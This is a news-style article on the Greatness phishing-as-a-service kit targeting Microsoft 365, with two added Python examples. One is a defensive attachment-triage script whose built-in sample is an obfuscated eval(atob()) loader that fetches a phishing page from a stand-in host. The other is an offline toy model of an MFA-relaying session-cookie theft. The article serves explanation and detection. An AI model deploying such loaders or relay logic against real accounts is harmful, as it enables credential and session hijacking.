The 'Greatness' phishing-as-a-service (PhaaS) platform has experienced an increase in activity as it targets organisations using Microsoft 365 in the United States, Canada, the United Kingdom, Australia, and South Africa.
Microsoft 365 is a cloud-based productivity suite used by many organisations globally, which makes its accounts a lucrative target for cybercriminals looking to steal data or to use the credentials as a foothold for network breaches.
Researchers at Cisco Talos describe how the Greatness phishing platform started operating in mid-2022, with a surge in activity in December 2022 and another in March 2023.
Most victims are based in the United States, and many of them are employed in industries like manufacturing, healthcare, technology, education, real estate, construction, finance, and business services.
Modus operandi
The Greatness phishing-as-a-service includes everything a would-be phishing actor needs to run a successful campaign.
To launch a campaign, the affiliate logs into the Greatness admin panel with their API key and supplies a list of target email addresses.
The PhaaS platform then allocates the required infrastructure, such as the server that will host the phishing page, and generates the HTML attachment.
The affiliate then writes the email's content, supplies any additional details, and adjusts the default settings as needed.
The victim then receives an email from the service carrying an HTML attachment. When the attachment is opened, the browser runs obfuscated JavaScript that connects to the Greatness server and retrieves the phishing page to display.
Because Greatness pre-fills the victim's email address on the login form to make it look legitimate, the victim only has to enter their password on the convincing phishing page.
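A mail gateway or SOC analyst triaging attachments of this class can score them on a few generic traits: an inline script, a base64 literal that decodes to more script, calls that unwrap and execute it, a callback to a remote host, and an embedded email address used to pre-fill the login form. The script below is an added example, not Cisco Talos tooling and not Greatness code; the weights, the threshold, the sample attachments and the hosts on the reserved `.invalid` / `.example` domains are all constructed assumptions, not published Greatness indicators.

```python
"""Heuristic triage of an HTML e-mail attachment for HTML-smuggling traits.

Added example, not Cisco Talos tooling and not Greatness code. The traits
checked are generic assumptions about this attachment class, not published
Greatness indicators; tune the weights and THRESHOLD against your own corpus.
"""
import base64
import re
from dataclasses import dataclass, field

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Call families; each family adds a fixed (assumed) weight if any member appears.
DECODE_CALLS = ("atob(", "unescape(", "fromCharCode(", "eval(")
CALLBACK_CALLS = ("fetch(", "XMLHttpRequest", "location.href", "location.replace(", "<iframe")
RENDER_CALLS = ("document.write(", "innerHTML")
THRESHOLD = 6  # assumed cut-off


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    emails: list = field(default_factory=list)


def decode_base64_literals(text: str) -> list:
    """Return each long base64 literal in text that decodes to readable UTF-8."""
    found = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in raw):
            found.append(raw)
    return found


def triage_html_attachment(html_text: str) -> Verdict:
    """Score one attachment; inspects inline scripts plus one decoded base64 layer."""
    v = Verdict()
    scripts = SCRIPT_RE.findall(html_text)
    if not scripts:
        return v  # no script at all: out of scope for this heuristic
    raw_script = "\n".join(scripts)
    payloads = decode_base64_literals(raw_script)
    if payloads:
        v.score += 3
        v.reasons.append(f"{len(payloads)} base64 literal(s) decode to text (smuggled payload)")
    blob = "\n".join([raw_script, *payloads])  # search raw and decoded layers together
    for label, calls in (("decode/execute", DECODE_CALLS),
                         ("remote callback", CALLBACK_CALLS),
                         ("page rewrite", RENDER_CALLS)):
        hits = sorted(c for c in calls if c in blob)
        if hits:
            v.score += 2
            v.reasons.append(f"{label} calls: {', '.join(hits)}")
    v.urls = sorted(set(URL_RE.findall(blob)))
    if v.urls:
        v.score += 2
        v.reasons.append("remote URL(s) in script: " + ", ".join(v.urls))
    v.emails = sorted(set(EMAIL_RE.findall(blob)))
    if v.emails:
        v.score += 2
        v.reasons.append("e-mail address embedded in script (login pre-fill): " + ", ".join(v.emails))
    return v


def is_suspicious(v: Verdict) -> bool:
    return v.score >= THRESHOLD


# Constructed samples on reserved/hypothetical hosts. The malicious one mirrors
# the described behaviour: decode a script when opened, which then pulls the
# real phishing page from a remote host with the target's address attached.
_INNER_SCRIPT = (
    'var u="https://login-portal.example.invalid/p?e="+encodeURIComponent("jane.doe@corp.example");'
    "fetch(u).then(r=>r.text()).then(h=>document.write(h));"
)
SAMPLE_MALICIOUS = (
    "<html><body><p>Loading document...</p><script>"
    'eval(atob("' + base64.b64encode(_INNER_SCRIPT.encode()).decode() + '"));'
    "</script></body></html>"
)
SAMPLE_BENIGN = (
    "<html><body><h1>Invoice</h1><script>"
    "document.getElementById('total').focus();</script></body></html>"
)

if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        verdict = triage_html_attachment(sample)
        print(f"{name}: score={verdict.score} suspicious={is_suspicious(verdict)}")
        for reason in verdict.reasons:
            print("  -", reason)
```

The single decoded layer is deliberate: real samples may nest several encodings, so a production version would loop `decode_base64_literals` over its own output until nothing new appears, and would also treat an attachment that contacts any host outside the organisation's allow-list as worth a sandbox detonation regardless of score.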
To obtain a valid session cookie for the target account, the platform now acts as an adversary-in-the-middle proxy, relaying the authentication flow between the victim's browser and the genuine Microsoft 365 login page.
If the account is protected by MFA, Greatness forwards the login to the genuine Microsoft service, which sends a one-time code to the victim's device, and then prompts the victim to enter that code on the phishing page.
Once the MFA code is entered, Greatness completes the login as the victim on the genuine Microsoft platform and delivers the authenticated session cookie to the affiliate via a Telegram channel or the service's web panel.
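The relay described in the three steps above can be modelled in a few dozen lines. The following is an added illustration, not Greatness code and not Microsoft's login protocol: `ToyIdP` stands in for the genuine service, `AitMRelay` for the PhaaS server, the `devices` dict for the victim's phone, and `affiliate_inbox` for the Telegram channel; the account and password are constructed. Everything runs in-process with no network.

```python
"""Toy model of the adversary-in-the-middle relay described in the article.

Added illustration, not Greatness code and not Microsoft's login protocol.
The point it shows: the OTP the victim types is genuine, so the relay never
has to defeat MFA; it only has to forward each step and keep the cookie.
"""
import hmac
import secrets


class ToyIdP:
    """Genuine identity provider: password, then a one-time code, then a session cookie."""

    def __init__(self, devices: dict):
        self.users = {}          # email -> password
        self.pending = {}        # email -> OTP awaiting entry
        self.sessions = set()    # issued session cookies
        self.devices = devices   # email -> "phone" that receives the OTP

    def register(self, email: str, password: str) -> None:
        self.users[email] = password

    def submit_password(self, email: str, password: str) -> str:
        if not hmac.compare_digest(self.users.get(email, ""), password):
            return "invalid"
        otp = f"{secrets.randbelow(10**6):06d}"
        self.pending[email] = otp
        self.devices[email] = otp            # the OTP really goes to the victim's device
        return "mfa_required"

    def submit_otp(self, email: str, otp: str):
        expected = self.pending.pop(email, None)
        if expected is None or not hmac.compare_digest(expected, otp):
            return None
        cookie = secrets.token_hex(16)
        self.sessions.add(cookie)
        return cookie

    def is_valid_session(self, cookie: str) -> bool:
        return cookie in self.sessions


class AitMRelay:
    """The phishing page's backend: forwards each step to the real IdP verbatim."""

    def __init__(self, idp: ToyIdP):
        self.idp = idp
        self.affiliate_inbox = []  # stands in for the Telegram channel / web panel

    def password_form(self, email: str, password: str) -> str:
        # Forwarding the real password is what makes the IdP send a genuine OTP.
        return self.idp.submit_password(email, password)

    def otp_form(self, email: str, otp: str):
        cookie = self.idp.submit_otp(email, otp)
        if cookie is not None:
            self.affiliate_inbox.append((email, cookie))  # "valid cookie" notification
        return cookie


def phish_victim(relay: AitMRelay, devices: dict, email: str, password: str) -> None:
    """What the victim does on the phishing page: email is pre-filled, they type the rest."""
    if relay.password_form(email, password) == "mfa_required":
        otp_on_phone = devices[email]          # victim reads the genuine code...
        relay.otp_form(email, otp_on_phone)    # ...and types it into the phishing page


def demo():
    devices = {}
    idp = ToyIdP(devices)
    idp.register("jane.doe@corp.example", "correct horse battery staple")  # constructed account
    relay = AitMRelay(idp)
    phish_victim(relay, devices, "jane.doe@corp.example", "wrong guess")   # fails, nothing stolen
    phish_victim(relay, devices, "jane.doe@corp.example", "correct horse battery staple")
    return idp, relay


if __name__ == "__main__":
    idp, relay = demo()
    for email, cookie in relay.affiliate_inbox:
        print(f"affiliate received cookie for {email}; valid at IdP: {idp.is_valid_session(cookie)}")
```

The model deliberately covers only MFA factors the victim can read and retype, because that is the factor class this flow defeats: anything the user can copy from one screen to another, the relay can copy too. A credential that is cryptographically bound to the site origin the browser is actually talking to would fail at the relay's host rather than at Microsoft's, which is why that distinction, and not the presence of a second factor, is what determines exposure to this kit.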
"Authenticated sessions usually time out after a while, which is possibly one of the reasons the Telegram bot is used - it informs the attacker about valid cookies as soon as possible to ensure they can reach quickly if the target is interesting," Cisco Talos said.
With this session cookie, the attackers can access the victim's email, files, and data across Microsoft 365 services without having to authenticate again.
The stolen credentials are also frequently used to break into corporate networks, which can lead to even more damaging activity, such as the deployment of ransomware.